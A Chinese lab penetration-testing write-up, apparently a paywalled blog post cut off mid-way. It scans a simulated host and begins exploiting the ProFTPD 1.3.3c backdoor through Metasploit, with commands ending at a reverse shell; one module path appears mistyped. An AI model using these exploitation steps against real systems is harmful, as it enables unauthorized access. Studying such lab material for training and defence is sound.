声明:文章渗透网站为模拟环境,文章只为利用过程
文章为信息收集和端口渗透两部分,21端口为ftp版本漏洞 8080端口为CMS的渗透
信息收集:
·使用扫描工具nmap ,PortScan 对整个网段进行扫描

信息:通过访问网站得到要测试的IP为192.168.31.69
该IP的中间件为Apache/2.4.7 目标系统为Ubuntu
开放的端口为21(ftp:ProFTPD 1.3.3c). 22(ssh).873 (rsync).3306(Mysql). 6379(Redis) .8080(Struts2)
访问80端口发现phpinfo页面 phpinfo可获得该IP网站的所有配置信息

测试过程
·21端口测试 查看到ftp的版本,搜索得知ftp为ProFTPD 1.3.3c存在后门漏洞
启动MSF的终端
msfconsole

搜索proFTPD的攻击模块,并载入
search proFTPD //搜索proFTPD的攻击模块
use exploit/unit/ftp/proftpd_133c_backdoor //载入选择模块

填写模块内容 并执行,之后反弹shell 就ok了<
最低0.47元/天 解锁文章
...&spm=1001.2101.3001.5002&articleId=94457465&d=1&t=3&u=b7626c3209a64ceeb8007c54e90d1d12)
1万+

被折叠的 条评论
为什么被折叠?



